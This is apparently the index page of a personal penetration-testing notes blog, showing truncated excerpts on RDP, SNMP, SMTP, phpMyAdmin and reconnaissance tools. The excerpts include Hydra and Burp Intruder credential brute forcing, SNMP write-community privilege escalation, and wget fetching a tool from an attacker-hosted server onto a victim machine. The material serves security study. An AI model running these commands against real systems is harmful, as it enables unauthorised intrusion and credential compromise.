Shuciran Pentesting Notes

RDP (tcp-3389)

NMAP Multiple Vulns nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 10.11.1.7 Brute Force Hydra hydra -l pedro -P /usr/share/wordlists/rockyou.txt 10.11.1.7 rdp ...

SNMP (udp-161)

SNMPWALK Enumerate the entire public community using SNMPv2, -t 10 to increase the timeout period to 10 seconds: snmpwalk -v 2c -c Public -t 10 10.10.11.107 snmpcheck 10.10.202.78 -c Public Exampl...

PHPMyAdmin Brute Force via Burpsuite Intruder

Burp Suite Intruder Since the default credentials didn’t seem to work and blank passwords aren’t allowed, let’s try to automate some basic username and password combinations with Burp Suite’s Intr...

Local Web Server

Python3 Via web: # On our machine: python3 -m http.server 8888 # On victim machine: wget http://10.10.16.5:8888/pspy64 chmod +x pspy64 Python2 python -m SimpleHTTPServer 7331 PHP php -S 0.0....

User Enumeration Gathering

The Harvester theHarvester -d megacorpone.com -b google The Harvester doesn’t works really well on newer versions of Kali, use the docker image if that is the case. docker run -ti --rm thehar...

Nikto

The simplest option is to set the -maxtime option, which will halt the scan after the specified time limit: nikto -host=http://www.megacorpone.com -maxtime=30s Our second option is to tune the sca...

Search Engines

Shodan Shodan Search Engine for connected devices over the Internet. You can use various filters while using shodan, among others are: hostname port country Censys Censys Search Engine ...

SNMP Read and Write Community Abuse

SNMP Priv Escalation If port 161 is open internally you can search for the /etc/snmp/snmpd.conf file and review its content, notice that private community is read and writable: rocommunity public...

SMTP (tcp-25)

VRFY USER ENUMERATION With user and IP as input by the user: #!/usr/bin/python import socket import sys if len(sys.argv) != 3: print("Usage: vrfy.py <IP> <users_list>") ...

Netcat Port Scanning

TCP Scanning The -w option specifies the connection timeout in seconds and -z is used to specify zero-I/O mode, which will send no data and is used for scanning: nc -nvv -w 1 -z 10.11.1.220 3388-...